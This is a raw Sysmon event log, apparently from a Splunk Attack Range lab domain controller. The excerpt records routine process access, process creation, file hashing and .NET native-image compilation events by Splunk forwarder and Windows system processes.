21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.054{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ACE52486ED9F1CFFE337C1732B0A22D,SHA256=1D15C7BDF43B58AC9C8FA14010735CF0A8C288DF7C92B0BDFA0DD734FE2BDA10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.771{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.771{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.772{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.365{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD24E775ED5F7F4C0AE2FAD68A65A59B,SHA256=58980F914A9D39F68ED4FC7C3187F17B2D3DC6E33F3CF1D4A67975D02B825E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.021{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0071B5EE8BF91FE76A357B7B3559986C,SHA256=37670B8E904008361E8E1444B447E1E013EE26BBDB49F6978C84EDD6F42732D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:00.787{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DFD5006FF91862D137B422F36EF263C,SHA256=D69F9FAB26FBE579F9414415A195BE594448CED6A379F52C9D0EC8CAFB35B598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:00.037{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49EB91084852FCD1C2551E7507E78A9,SHA256=C436E76538D9B08914853620884CFC1AC12941CD6866C6B72D107440ADE95EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:01.084{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E34515AB3878B8EB2ABAE4C1128A5E6D,SHA256=6F709DDAB09975D8BCCEC465F238320C30DCDD54C9925B78F40CD4B311737899,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:00.216{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61364-false10.0.1.12-8000- 23542300x800000000000000018726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:02.099{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDA80344BE493817CBE36EC1421CE6F,SHA256=BF6129A1C4AFBA6F35B44049BB0F7904E94C34E61EF10D808B606AD841013D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:03.115{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD78A392DA940A99AC15BC6AB6698303,SHA256=52917F598EA05D292BCB5F8635DBFD26BAE1413AC9F617EAA80E09CC4813B000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.896{4DB9351A-A10A-60D3-5D02-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HER0Y5XJ3W\System.Design.ni.dll.auxMD5=D7A0DAF439CBF822EF1F0FC519546D22,SHA256=ECD2438DFCD947364F742B17816F9E98069B290C1B6C7B1A5B513C0EFACA4EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.896{4DB9351A-A10A-60D3-5D02-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HER0Y5XJ3W\System.Design.ni.dllMD5=E0F70BDE57A9C3BCB0376363B612D788,SHA256=C8F6F5B03BBA740EADFF096F78189CE7F631C15B1569A23BDA7904397D815BD9,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:04.568{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10b4-0\System.Design.dll2021-06-23 21:01:04.568 23542300x800000000000000018729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.130{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5F6DC6A9744CCFEE7A54FD7BACCD83,SHA256=AEFCA3A50A672316A4A6C5E534D413ED84ECD73654A55C9B7EEAEA852522E3FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.599{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.599{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.490{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.474{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.474{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0